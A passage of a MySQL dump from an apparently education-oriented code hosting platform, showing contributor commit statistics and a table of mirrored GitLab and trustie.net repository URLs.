Bursztyka','tomasz.bursztyka@linux.intel.com',97644,52337,'2018-12-06 18:41:40','2018-12-06 18:41:40',149981),(86,31,631,'Andrei Emeltchenko','andrei.emeltchenko@intel.com',28062,13165,'2018-12-06 18:41:40','2018-12-06 18:41:40',41227),(87,31,627,'Luiz Augusto von Dentz','luiz.von.dentz@intel.com',27196,14044,'2018-12-06 18:41:40','2018-12-06 18:41:40',41240),(88,31,555,'Peter Mitsis','peter.mitsis@windriver.com',30753,30020,'2018-12-06 18:41:40','2018-12-06 18:41:40',60773),(89,31,543,'Kumar Gala','kumar.gala@linaro.org',196659,691821,'2018-12-06 18:41:40','2018-12-06 18:41:40',888480),(90,31,449,'Szymon Janc','ext.szymon.janc@tieto.com',16840,8289,'2018-12-06 18:41:40','2018-12-06 18:41:40',25129),(91,32,103643,'Jenkins','jenkins@review.openstack.org',103921,103884,'2018-12-06 18:42:25','2018-12-06 18:42:25',207805),(92,32,8109,'OpenStack Proposal Bot','openstack-infra@lists.openstack.org',8109,8094,'2018-12-06 18:42:25','2018-12-06 18:42:25',16203),(93,32,4177,'Zuul','zuul@review.openstack.org',4177,4177,'2018-12-06 18:42:25','2018-12-06 18:42:25',8354),(94,32,718,'Doug Hellmann','doug@doughellmann.com',741,734,'2018-12-06 18:42:25','2018-12-06 18:42:25',1475),(95,32,621,'Paul Belanger','pabelanger@redhat.com',625,625,'2018-12-06 18:42:25','2018-12-06 18:42:25',1250),(96,32,600,'Andreas Jaeger','aj@suse.com',761,759,'2018-12-06 18:42:25','2018-12-06 18:42:25',1520),(97,32,549,'Monty Taylor','mordred@inaugust.com',948,812,'2018-12-06 18:42:25','2018-12-06 18:42:25',1760),(98,32,370,'Clark Boylan','clark.boylan@gmail.com',370,369,'2018-12-06 18:42:25','2018-12-06 18:42:25',739),(99,32,361,'James E. Blair','jeblair@redhat.com',595,593,'2018-12-06 18:42:25','2018-12-06 18:42:25',1188),(100,32,341,'Jeremy Stanley','fungi@yuggoth.org',341,340,'2018-12-06 18:42:25','2018-12-06 18:42:25',681),(101,34,742,'Vinod Kumar Vavilapalli','vinodkv@apache.org',913991,514134,'2018-12-06 18:43:08','2018-12-06 18:43:08',1428125),(102,34,732,'Tsz-wo Sze','szetszwo@apache.org',146448,89173,'2018-12-06 18:43:08','2018-12-06 18:43:08',235621),(103,34,613,'Andrew Wang','wang@apache.org',90611,84804,'2018-12-06 18:43:08','2018-12-06 18:43:08',175415),(104,34,567,'Todd Lipcon','todd@apache.org',1551107,779383,'2018-12-06 18:43:08','2018-12-06 18:43:08',2330490),(105,34,553,'Arpit Agarwal','arp@apache.org',82033,37504,'2018-12-06 18:43:08','2018-12-06 18:43:08',119537),(106,34,551,'Akira Ajisaka','aajisaka@apache.org',91385,61302,'2018-12-06 18:43:08','2018-12-06 18:43:08',152687),(107,34,516,'Suresh Srinivas','suresh@apache.org',151109,62552,'2018-12-06 18:43:08','2018-12-06 18:43:08',213661),(108,34,441,'Eli Collins','eli@apache.org',35896,186994,'2018-12-06 18:43:08','2018-12-06 18:43:08',222890),(109,34,434,'Aaron Myers','atm@apache.org',53616,19991,'2018-12-06 18:43:08','2018-12-06 18:43:08',73607),(110,34,421,'Jian He','jianhe@apache.org',253513,108738,'2018-12-06 18:43:08','2018-12-06 18:43:08',362251),(111,41,2,'Simone Margaritelli','evilsocket@gmail.com',NULL,NULL,'2018-12-06 18:43:24','2019-01-08 15:04:45',NULL),(112,41,2,'tntljc','tnt_0206@163.com',120,13,'2018-12-06 18:43:24','2018-12-06 18:43:24',133),(113,41,1,'Jens Hoffmann','jehoffma@gmail.com',1307,1330,'2018-12-06 18:43:24','2018-12-06 18:43:24',2637),(114,42,1,'Santiago Castro','santi.1410@hotmail.com',13,13,'2018-12-06 18:44:16','2018-12-06 18:44:16',26),(115,42,1,'Samuel Groß','dev@samuel-gross.de',20611,0,'2018-12-06 18:44:16','2018-12-06 18:44:16',20611),(116,42,1,'Samuel Groß','dev@samuel-gross.com',20611,0,'2018-12-06 18:44:16','2018-12-06 18:44:16',20611),(117,58,18,'Leonardo lontra','lhe.lontra@gmail.com',50,14,'2018-12-06 18:45:55','2019-01-08 15:21:05',64),(118,58,7,'droidicus','droidicus@users.noreply.github.com',39,10,'2018-12-06 18:45:55','2018-12-06 18:45:55',49),(119,58,1,'Liu Qun','qunliu@zyhx-group.com',32,0,'2018-12-06 18:45:55','2019-01-08 15:21:05',32),(120,58,1,'Your Name','you@example.com',9,9,'2018-12-06 18:45:55','2018-12-06 18:45:55',18),(121,58,1,'Yasuhiro Matsumoto','mattn.jp@gmail.com',1,1,'2018-12-06 18:45:55','2018-12-06 18:45:55',2),(122,59,8,'Cosmin Gorgovan','cosmin@linux-geek.org',684,51,'2018-12-06 18:46:12','2018-12-06 18:46:12',735),(123,60,64,'Andrew Payne','andy@payne.org',9296,254,'2018-12-06 18:46:25','2018-12-06 18:46:25',9550),(124,60,8,'Emil Brink','emil@obsession.se',27,16,'2018-12-06 18:46:25','2018-12-06 18:46:25',43),(125,61,26,'Bjoern Kerler','info@revskills.de',1363,218,'2018-12-06 18:46:36','2018-12-06 18:46:36',1581),(126,61,1,'hazardousparticle','j1619@live.com',23,13,'2018-12-06 18:46:36','2018-12-06 18:46:36',36),(127,61,1,'Bjoern Kerler','6317772+bkerler@users.noreply.github.com',1363,218,'2018-12-06 18:46:36','2018-12-06 18:46:36',1581),(128,62,46,'rxrz','rxrzlvzu@shortmail.me',11995,156,'2018-12-06 18:46:44','2018-12-06 18:46:44',12151),(129,62,41,'Yuri.Sh','dorimanx@users.noreply.github.com',9,1,'2018-12-06 18:46:44','2018-12-06 18:46:44',10),(130,62,19,'Liu Qishuai','lqs@lqs.me',6051,6274,'2018-12-06 18:46:44','2018-12-06 18:46:44',12325),(131,62,6,'dorimanx','yuri@bynet.co.il',231,25,'2018-12-06 18:46:44','2019-01-08 15:36:25',256),(132,62,7,'rxrz','rxrz@users.noreply.github.com',11995,156,'2018-12-06 18:46:44','2018-12-06 18:46:44',12151),(133,62,4,'Torstein Husebø','torstein@huseboe.net',36,41,'2018-12-06 18:46:44','2018-12-06 18:46:44',77),(134,62,4,'Benjamin Valentin','benpicco@zedat.fu-berlin.de',54,9,'2018-12-06 18:46:44','2018-12-06 18:46:44',63),(135,62,3,'D. Andrei Măceș','dmaces@nd.edu',13,2,'2018-12-06 18:46:44','2018-12-06 18:46:44',15),(136,63,9,'Rick Boykin','rick@mondorobot.com',732,29,'2018-12-06 18:46:51','2018-12-06 18:46:51',761),(137,89,1,'huang','huang.jingquan@163.com',0,0,'2019-01-18 07:57:35','2019-01-18 07:57:35',0),(138,129,45,'zhangshuai','zhangshuai9999@outlook.com',5414996,3125165,'2019-04-02 19:39:46','2019-07-15 14:51:03',8540161),(139,130,7,'AIRC exercise','airc_exercise@163.com',2047119,463534,'2019-04-27 15:17:07','2019-05-25 17:07:24',2510653),(140,101,1,'jingquan huang','huang.jingquan@163.com',0,0,'2019-04-29 10:31:00','2019-04-29 10:31:00',0),(141,100,1,'jingquan huang','huang.jingquan@163.com',1,0,'2019-04-29 23:27:15','2019-04-29 23:27:15',1),(142,164,60,'Kai Moseley','kai.moseley@onfido.com',71269,55682,'2019-10-24 10:42:58','2019-10-24 10:42:58',126951),(143,164,51,'Kai Moseley','kai.moseley@gmail.com',71269,55682,'2019-10-24 10:42:58','2019-10-24 10:42:58',126951),(144,164,3,'Sancha Pereira','sancha.pereira@onfido.com',52,4,'2019-10-24 10:42:58','2019-10-24 10:42:58',56),(145,164,2,'DavidLi','limj_9803@163.com',NULL,NULL,'2019-10-24 10:42:58','2019-10-24 10:42:58',NULL),(146,164,1,'Kai Moseley','kai.moseley@gmail.co.uk',71269,55682,'2019-10-24 10:42:58','2019-10-24 10:42:58',126951),(147,227,2,'davidLi','limj_9803@163.com',1151,0,'2019-11-11 15:12:40','2019-11-11 15:12:40',1151),(148,227,1,'1','333@qq.com',1151,0,'2019-11-11 15:12:40','2019-11-11 15:12:40',1151),(149,232,2,'davidLi','limj_9803@163.com',1151,0,'2019-11-12 09:23:29','2019-11-12 09:23:29',1151),(150,232,1,'Administrator','admin@example.com',121,0,'2019-11-12 09:23:29','2019-11-12 09:23:29',121),(151,232,1,'1','333@qq.com',1151,0,'2019-11-12 09:23:29','2019-11-12 09:23:29',1151),(152,251,2,'Administrator','admin@example.com',80,0,'2020-02-04 22:38:52','2020-02-04 22:38:52',80);
|
||
/*!40000 ALTER TABLE `rep_statics` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `repositories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `repositories`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `repositories` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL DEFAULT '0',
|
||
`url` varchar(255) NOT NULL DEFAULT '',
|
||
`login` varchar(60) DEFAULT '',
|
||
`password` varchar(255) DEFAULT '',
|
||
`root_url` varchar(255) DEFAULT '',
|
||
`type` varchar(255) DEFAULT NULL,
|
||
`path_encoding` varchar(64) DEFAULT NULL,
|
||
`log_encoding` varchar(64) DEFAULT NULL,
|
||
`extra_info` text,
|
||
`identifier` varchar(255) DEFAULT NULL,
|
||
`is_default` tinyint(1) DEFAULT '0',
|
||
`hidden` tinyint(1) DEFAULT '0',
|
||
`shixun_id` int(11) DEFAULT NULL,
|
||
`myshixun_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`mirror_url` varchar(255) DEFAULT NULL,
|
||
`version_releases_count` int(11) DEFAULT '0',
|
||
`fork_url` varchar(255) DEFAULT NULL,
|
||
`is_mirror` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_repositories_on_project_id` (`project_id`),
|
||
KEY `index_repositories_on_identifier` (`identifier`),
|
||
KEY `index_repositories_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=584 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `repositories`
|
||
--
|
||
|
||
LOCK TABLES `repositories` WRITE;
|
||
/*!40000 ALTER TABLE `repositories` DISABLE KEYS */;
|
||
INSERT INTO `repositories` VALUES (133,99,'http://47.95.219.161:3000/innov/pp3fnk7u2.git','','','pp3fnk7u2','Repository::Gitlab',NULL,NULL,'--- \n...\n','pp3fnk7u2',1,0,NULL,NULL,1,NULL,0,NULL,0),(134,100,'http://47.95.219.161:3000/innov/p5gj3eup9.git','','','p5gj3eup9','Repository::Gitlab',NULL,NULL,'--- \n...\n','p5gj3eup9',1,0,NULL,NULL,1,NULL,0,NULL,0),(135,101,'http://47.95.219.161:3000/innov/pfeqmgvux.git','','','pfeqmgvux','Repository::Gitlab',NULL,NULL,'--- \n...\n','pfeqmgvux',1,0,NULL,NULL,1,NULL,0,NULL,0),(136,102,'http://47.95.219.161:3000/p83921064/pfeqmgvux.git','','','pfeqmgvux','Repository::Gitlab',NULL,NULL,'--- \n...\n','pfeqmgvux',1,0,NULL,NULL,6,NULL,0,NULL,0),(137,103,'http://47.95.219.161:3000/p83921064/pfeqmgvux-1.git','','','pfeqmgvux-1','Repository::Gitlab',NULL,NULL,'--- \n...\n','pfeqmgvux-1',1,0,NULL,NULL,6,NULL,0,NULL,0),(154,120,'http://47.95.219.161:3000/p81523470/ppovb5fc7.git','','','ppovb5fc7','Repository::Gitlab',NULL,NULL,'--- \n...\n','ppovb5fc7',1,0,NULL,NULL,26,NULL,0,NULL,0),(161,127,'http://47.95.219.161:3000/p26913408/p59vpf7at.git','','','p59vpf7at','Repository::Gitlab',NULL,NULL,'--- \n...\n','p59vpf7at',1,0,NULL,NULL,32,NULL,0,NULL,0),(163,129,'http://47.95.219.161:3000/p80426359/pxmlw6n2f.git','','','pxmlw6n2f','Repository::Gitlab',NULL,NULL,'--- \n...\n','pxmlw6n2f',1,0,NULL,NULL,29,NULL,0,NULL,0),(164,130,'http://47.95.219.161:3000/p81523470/p9fj35fl6.git','','','p9fj35fl6','Repository::Gitlab',NULL,NULL,'--- \n...\n','p9fj35fl6',1,0,NULL,NULL,26,NULL,0,NULL,0),(165,131,'http://47.95.219.161:3000/p83921064/pw8v6oxsu.git','','','pw8v6oxsu','Repository::Gitlab',NULL,NULL,'--- \n...\n','pw8v6oxsu',1,0,NULL,NULL,6,NULL,0,NULL,0),(171,137,'http://47.95.219.161:3000/p71924506/hector_quadrotor.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','hector_quadrotor',1,0,NULL,NULL,50,NULL,0,NULL,0),(173,139,'http://47.95.219.161:3000/p71924506/meta-ros.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','meta-ros',1,0,NULL,NULL,50,NULL,0,NULL,0),(174,140,'http://47.95.219.161:3000/p71924506/att_ekf.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','att_ekf',1,0,NULL,NULL,50,NULL,0,NULL,0),(175,141,'http://47.95.219.161:3000/p71924506/cylon.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','cylon',1,0,NULL,NULL,50,NULL,0,NULL,0),(177,143,'http://47.95.219.161:3000/p71924506/airsim.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','airsim',1,0,NULL,NULL,50,NULL,0,NULL,0),(178,144,'http://47.95.219.161:3000/p36850791/kinetic-devel.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','kinetic-devel',1,0,NULL,NULL,54,NULL,0,NULL,0),(183,156,'http://47.95.219.161:3000/p71924506/chartkick.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','chartkick',1,0,NULL,NULL,50,NULL,0,NULL,0),(188,158,'http://47.95.219.161:3000/p71924506/redux-scc.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','redux-scc',1,0,NULL,NULL,50,NULL,0,NULL,0),(189,159,'http://47.95.219.161:3000/p71924506/redux-bluetooth.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','redux-bluetooth',1,0,NULL,NULL,50,NULL,0,NULL,0),(199,169,'http://47.95.219.161:3000/p78543092/rubystudy.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','rubystudy',1,0,NULL,NULL,46,NULL,0,NULL,0),(210,178,'http://47.95.219.161:3000/p71924506/wblog.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','wblog',1,0,NULL,NULL,50,NULL,0,NULL,0),(248,199,'http://47.95.219.161:3000/p51497208/risc-v3.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','risc-v3',1,0,NULL,NULL,49,NULL,0,NULL,0),(249,200,'RISC-V3','','','RISC-V3','Repository::Gitlab',NULL,NULL,'--- \n...\n','RISC-V3',1,0,NULL,NULL,NULL,NULL,0,NULL,0),(261,204,'','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','hh',1,0,NULL,NULL,NULL,NULL,0,NULL,0),(262,205,'','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','kk',1,0,NULL,NULL,NULL,NULL,0,NULL,0),(278,217,'http://47.95.219.161:3000/p71924506/DZKnwufiE.git','','','',NULL,NULL,NULL,NULL,'DZKnwufiE',1,0,NULL,NULL,50,NULL,0,NULL,0),(281,219,'http://47.95.219.161:3000/p71924506/ddd_xxxs.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','ddd_xxxs',1,0,NULL,NULL,50,NULL,0,NULL,0),(284,221,'http://47.95.219.161:3000/p71924506/defibus.git','','','','Repository::Gitlab',NULL,NULL,NULL,'defibus',1,0,NULL,NULL,50,NULL,0,NULL,0),(285,202,'','','','','Repository::Gitlab',NULL,NULL,NULL,'12306',1,0,NULL,NULL,NULL,NULL,0,NULL,0),(287,223,'http://47.95.219.161:3000/p71924506/gopub.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','gopub',1,0,NULL,NULL,50,NULL,0,NULL,0),(288,224,'http://47.95.219.161:3000/m94108237/RISC-V3.git','','','RISC-V3','Repository::Gitlab',NULL,NULL,'--- \n...\n','RISC-V3',1,0,NULL,NULL,64,NULL,0,NULL,0),(289,225,'http://47.95.219.161:3000/p51497208/wblog.git','','','wblog','Repository::Gitlab',NULL,NULL,'--- \n...\n','wblog',1,0,NULL,NULL,49,NULL,0,NULL,0),(290,226,'http://47.95.219.161:3000/p71924506/RISC-V3.git','','','RISC-V3','Repository::Gitlab',NULL,NULL,'--- \n...\n','RISC-V3',1,0,NULL,NULL,50,NULL,0,NULL,0),(292,228,'wblog','','','wblog','Repository::Gitlab',NULL,NULL,'--- \n...\n','wblog',1,0,NULL,NULL,NULL,NULL,0,NULL,0),(294,230,'http://47.95.219.161:3000/p51497208/pfeqmgvux-1.git','','','pfeqmgvux-1','Repository::Gitlab',NULL,NULL,'--- \n...\n','pfeqmgvux-1',1,0,NULL,NULL,49,NULL,0,NULL,0),(295,231,'http://47.95.219.161:3000/m94108237/cylon.git','','','cylon','Repository::Gitlab',NULL,NULL,'--- \n...\n','cylon',1,0,NULL,NULL,64,NULL,0,NULL,0),(296,232,'http://47.95.219.161:3000/p51497208/risc-v2.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','risc-v2',1,0,NULL,NULL,49,NULL,0,NULL,0),(297,233,'risc-v2','','','risc-v2','Repository::Gitlab',NULL,NULL,'--- \n...\n','risc-v2',1,0,NULL,NULL,NULL,NULL,0,NULL,0),(305,248,'http://47.95.219.161:3000/m79305216/RISC-V3.git','','','RISC-V3','Repository::Gitlab',NULL,NULL,'--- \n...\n','RISC-V3',1,0,NULL,NULL,65,NULL,0,NULL,0),(306,250,'http://47.95.219.161:3000/p71924506/risc-v2.git','','','risc-v2','Repository::Gitlab',NULL,NULL,'--- \n...\n','risc-v2',1,0,NULL,NULL,50,NULL,0,NULL,0),(307,251,'http://47.95.219.161:3000/p72934568/master.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','master',1,0,NULL,NULL,75,NULL,0,NULL,0),(308,253,'http://47.95.219.161:3000/p72934568/risc-v2.git','','','risc-v2','Repository::Gitlab',NULL,NULL,'--- \n...\n','risc-v2',1,0,NULL,NULL,75,NULL,0,NULL,0),(309,254,'http://47.95.219.161:3000/p83571629/test_project.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','test_project',1,0,NULL,NULL,77,NULL,0,NULL,0),(310,256,'http://47.95.219.161:3000/p17836459/cloneworks.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','cloneworks',1,0,NULL,NULL,55,NULL,0,NULL,0),(311,257,'http://47.95.219.161:3000/p30472618/myclones.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','myclones',1,0,NULL,NULL,78,NULL,0,NULL,0),(312,258,'http://47.95.219.161:3000/p64583910/hinice.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','hinice',1,0,NULL,NULL,48,NULL,0,NULL,0),(313,261,'http://47.95.219.161:3000/p79084653/opensbi.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','opensbi',1,1,NULL,NULL,103,NULL,0,NULL,0),(315,263,'http://47.95.219.161:3000/p79084653/riscv-tools.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','riscv-tools',1,1,NULL,NULL,103,NULL,0,NULL,0),(316,264,'http://47.95.219.161:3000/p79084653/riscv-gnu-toolchain.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','riscv-gnu-toolchain',1,1,NULL,NULL,103,NULL,0,NULL,0),(317,262,'http://47.95.219.161:3000/p79084653/meta-riscv.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','meta-riscv',1,1,NULL,NULL,103,NULL,0,NULL,0),(318,265,'http://47.95.219.161:3000/p79084653/hello.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','hello',1,0,NULL,NULL,103,NULL,0,NULL,0),(319,266,'http://47.95.219.161:3000/p79084653/repo_demo.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','repo_demo',1,0,NULL,NULL,103,NULL,0,NULL,0),(320,267,'http://47.95.219.161:3000/p17836459/sequelize.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','sequelize',1,1,NULL,NULL,55,NULL,0,NULL,0),(321,268,'http://47.95.219.161:3000/p96170835/quickd.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','quickd',1,0,NULL,NULL,47,NULL,0,NULL,0),(322,269,'http://47.95.219.161:3000/p96170835/risc-v2.git','','','risc-v2','Repository::Gitlab',NULL,NULL,'--- \n...\n','risc-v2',1,0,NULL,NULL,47,NULL,0,NULL,0),(323,271,'http://47.95.219.161:3000/p96170835/orange.git','','','','Repository::Gitlab',NULL,NULL,'--- \n...\n','orange',1,0,NULL,NULL,47,NULL,0,NULL,0),(324,272,'http://47.95.219.161:3000/p69042815/master.git','','','master','Repository::Gitlab',NULL,NULL,'--- \n...\n','master',1,1,NULL,NULL,80,NULL,0,NULL,0),(325,132,'http://47.95.219.161:3000/p49726105/FqWIsYDRv.git','','','',NULL,NULL,NULL,NULL,'FqWIsYDRv',0,0,NULL,NULL,51,NULL,0,NULL,0),(326,157,'http://47.95.219.161:3000/p71924506/VXuUqnRvc.git','','','',NULL,NULL,NULL,NULL,'VXuUqnRvc',0,0,NULL,NULL,50,NULL,0,NULL,0),(327,252,'http://47.95.219.161:3000/p72934568/YUPibIXCB.git','','','',NULL,NULL,NULL,NULL,'YUPibIXCB',0,0,NULL,NULL,75,NULL,0,NULL,0),(328,255,'http://47.95.219.161:3000/p83571629/ixbYFZRsL.git','','','',NULL,NULL,NULL,NULL,'ixbYFZRsL',0,0,NULL,NULL,77,NULL,0,NULL,0),(330,270,'http://47.95.219.161:3000/p96170835/UgmxntjSV.git','','','',NULL,NULL,NULL,NULL,'UgmxntjSV',0,0,NULL,NULL,47,NULL,0,NULL,0),(331,273,'http://47.95.219.161:3000/p49726105/Tncejizko.git','','','',NULL,NULL,NULL,NULL,'Tncejizko',0,0,NULL,NULL,51,NULL,0,NULL,0),(332,274,'http://47.95.219.161:3000/p94386572/mluqNjgZQ.git','','','',NULL,NULL,NULL,NULL,'mluqNjgZQ',0,0,NULL,NULL,45,NULL,0,NULL,0),(364,306,'','p49726105','','',NULL,NULL,NULL,NULL,'bigdir',0,0,NULL,NULL,51,'https://git.trustie.net/Hjqreturn/bigdir.git',0,NULL,0),(365,307,'','p05617423','','',NULL,NULL,NULL,NULL,'bench4q',0,0,NULL,NULL,34,'https://git.trustie.net/coderfengyun/bench4q.git',0,NULL,0),(366,308,'','p51497208','','',NULL,NULL,NULL,NULL,'training_project',0,0,NULL,NULL,49,'https://git.trustie.net/Hjqreturn/training_project.git',0,NULL,0),(367,309,'','p86054721','','',NULL,NULL,NULL,NULL,'edudsj',0,0,NULL,NULL,61,'https://git.trustie.net/Hjqreturn/edudsj.git',0,NULL,0),(368,310,'','p78543092','','',NULL,NULL,NULL,NULL,'educodermobile',0,0,NULL,NULL,46,'https://git.trustie.net/yangSir/educodermobile.git',0,NULL,0),(369,311,'','p15679402','','',NULL,NULL,NULL,NULL,'swum',0,0,NULL,NULL,56,'https://git.trustie.net/Nigel/swum.git',0,NULL,0),(370,312,'','p85017694','','',NULL,NULL,NULL,NULL,'openinew',0,0,NULL,NULL,37,'https://git.trustie.net/Hjqreturn/openinew.git',0,NULL,0),(371,313,'','m26508134','','',NULL,NULL,NULL,NULL,'docklet',0,0,NULL,NULL,66,'https://git.trustie.net/nudtpc/docklet.git',0,NULL,0),(372,314,'','p78659104','','',NULL,NULL,NULL,NULL,'ossean',0,0,NULL,NULL,10,'https://git.trustie.net/yuyuenudt/ossean.git',0,NULL,0),(373,315,'','p78543092','','',NULL,NULL,NULL,NULL,'shos',0,0,NULL,NULL,46,'https://git.trustie.net/Hjqreturn/shos.git',0,NULL,0),(374,316,'','p61743098','','',NULL,NULL,NULL,NULL,'sagecal',0,0,NULL,NULL,38,'https://git.trustie.net/Hjqreturn/sagecal.git',0,NULL,0),(375,317,'','p05823419','','',NULL,NULL,NULL,NULL,'data_aggregation_backend',0,0,NULL,NULL,90,'https://git.trustie.net/ladventure/data_aggregation_backend.git',0,NULL,0),(376,318,'','p78543092','','',NULL,NULL,NULL,NULL,'haflow',0,0,NULL,NULL,46,'https://git.trustie.net/dawn/haflow.git',0,NULL,0),(377,319,'','p81736429','','',NULL,NULL,NULL,NULL,'abejas',0,0,NULL,NULL,84,'https://git.trustie.net/YS.wen/abejas.git',0,NULL,0),(378,320,'','p71924506','','',NULL,NULL,NULL,NULL,'DnlKbrZSH',0,0,NULL,NULL,50,'https://git.trustie.net/roadfar/DnlKbrZSH.git',0,NULL,0),(379,321,'','p91738645','','',NULL,NULL,NULL,NULL,'enclave_migration',0,0,NULL,NULL,108,'https://git.trustie.net/yzmizeyu/enclave_migration.git',0,NULL,0),(380,322,'','p50813649','','',NULL,NULL,NULL,NULL,'se15',0,0,NULL,NULL,24,'https://git.trustie.net/Stacey/se15.git',0,NULL,0),(381,323,'','p05617423','','',NULL,NULL,NULL,NULL,'software_engineering',0,0,NULL,NULL,34,'https://git.trustie.net/leonardo/software_engineering.git',0,NULL,0),(382,324,'','p93105276','','',NULL,NULL,NULL,NULL,'software',0,0,NULL,NULL,30,'https://git.trustie.net/songge/software.git',0,NULL,0),(383,325,'','p85017694','','',NULL,NULL,NULL,NULL,'software_program',0,0,NULL,NULL,37,'https://git.trustie.net/zhouchenglong/software_program.git',0,NULL,0),(384,326,'','p40918326','','',NULL,NULL,NULL,NULL,'201528015029031',0,0,NULL,NULL,15,'https://git.trustie.net/yinkang/201528015029031.git',0,NULL,0),(385,327,'','p94386572','','',NULL,NULL,NULL,NULL,'robot',0,0,NULL,NULL,45,'https://git.trustie.net/YS.wen/robot.git',0,NULL,0),(386,328,'','p62453891','','',NULL,NULL,NULL,NULL,'shangwen666',0,0,NULL,NULL,3,'https://git.trustie.net/Hjqreturn/shangwen666.git',0,NULL,0),(387,329,'','p74135680','','',NULL,NULL,NULL,NULL,'rscbound',0,0,NULL,NULL,99,'https://git.trustie.net/fanguangsheng/rscbound.git',0,NULL,0),(388,330,'','m79540236','','',NULL,NULL,NULL,NULL,'banbenku',0,0,NULL,NULL,67,'https://git.trustie.net/YZY/banbenku.git',0,NULL,0),(389,331,'','p15679402','','',NULL,NULL,NULL,NULL,'compkey',0,0,NULL,NULL,56,'https://git.trustie.net/elusiveEric/compkey.git',0,NULL,0),(390,332,'','p17836459','','',NULL,NULL,NULL,NULL,'erp',0,0,NULL,NULL,55,'https://git.trustie.net/ShaneTang/erp.git',0,NULL,0),(391,333,'','p83921064','','',NULL,NULL,NULL,NULL,'basketball',0,0,NULL,NULL,6,'https://git.trustie.net/chenpeng15/basketball.git',0,NULL,0),(392,334,'','p57486102','','',NULL,NULL,NULL,NULL,'minote',0,0,NULL,NULL,7,'https://git.trustie.net/wuziji/minote.git',0,NULL,0),(393,335,'','p19083625','','',NULL,NULL,NULL,NULL,'sslab',0,0,NULL,NULL,41,'https://git.trustie.net/hlq07/sslab.git',0,NULL,0),(394,336,'','p60294315','','',NULL,NULL,NULL,NULL,'3dnudtmap',0,0,NULL,NULL,76,'https://git.trustie.net/roadfar/3dnudtmap.git',0,NULL,0),(395,337,'','p49726105','','',NULL,NULL,NULL,NULL,'ambition',0,0,NULL,NULL,51,'https://git.trustie.net/snape3058/ambition.git',0,NULL,0),(396,338,'','p27318694','','',NULL,NULL,NULL,NULL,'lab5',0,0,NULL,NULL,16,'https://git.trustie.net/gayeep/lab5.git',0,NULL,0),(397,339,'','p49023857','','',NULL,NULL,NULL,NULL,'bus_project',0,0,NULL,NULL,104,'https://git.trustie.net/Yaoxiangdong/bus_project.git',0,NULL,0),(398,340,'','p49023857','','',NULL,NULL,NULL,NULL,'uask',0,0,NULL,NULL,104,'https://git.trustie.net/Hjqreturn/uask.git',0,NULL,0),(399,341,'','p40918326','','',NULL,NULL,NULL,NULL,'songp2p',0,0,NULL,NULL,15,'https://git.trustie.net/Nigel/songp2p.git',0,NULL,0),(400,342,'','p80426359','','',NULL,NULL,NULL,NULL,'ruangongchuangxinshijian',0,0,NULL,NULL,29,'https://git.trustie.net/cruel/ruangongchuangxinshijian.git',0,NULL,0),(401,343,'','p01469285','','',NULL,NULL,NULL,NULL,'aggregation-platform',0,0,NULL,NULL,97,'https://git.trustie.net/hushasha/aggregation-platform.git',0,NULL,0),(402,344,'','p96731420','','',NULL,NULL,NULL,NULL,'skyguard',0,0,NULL,NULL,21,'https://git.trustie.net/liuyang14a/skyguard.git',0,NULL,0),(403,345,'','p60294315','','',NULL,NULL,NULL,NULL,'past-headlines',0,0,NULL,NULL,76,'https://git.trustie.net/YanBowen/past-headlines.git',0,NULL,0),(404,346,'','p91472068','','',NULL,NULL,NULL,NULL,'findjob',0,0,NULL,NULL,39,'https://git.trustie.net/RubyBu/findjob.git',0,NULL,0),(405,347,'','p54839210','','',NULL,NULL,NULL,NULL,'2048jsgame',0,0,NULL,NULL,86,'https://git.trustie.net/Nigel/2048jsgame.git',0,NULL,0),(406,348,'','p06751394','','',NULL,NULL,NULL,NULL,'app',0,0,NULL,NULL,40,'https://git.trustie.net/haozhou/app.git',0,NULL,0),(407,349,'','p43702695','','',NULL,NULL,NULL,NULL,'pnote',0,0,NULL,NULL,36,'https://git.trustie.net/haha2087/pnote.git',0,NULL,0),(408,350,'','p01469285','','',NULL,NULL,NULL,NULL,'v-travel',0,0,NULL,NULL,97,'https://git.trustie.net/suxi1314/v-travel.git',0,NULL,0),(409,351,'','p91472068','','',NUL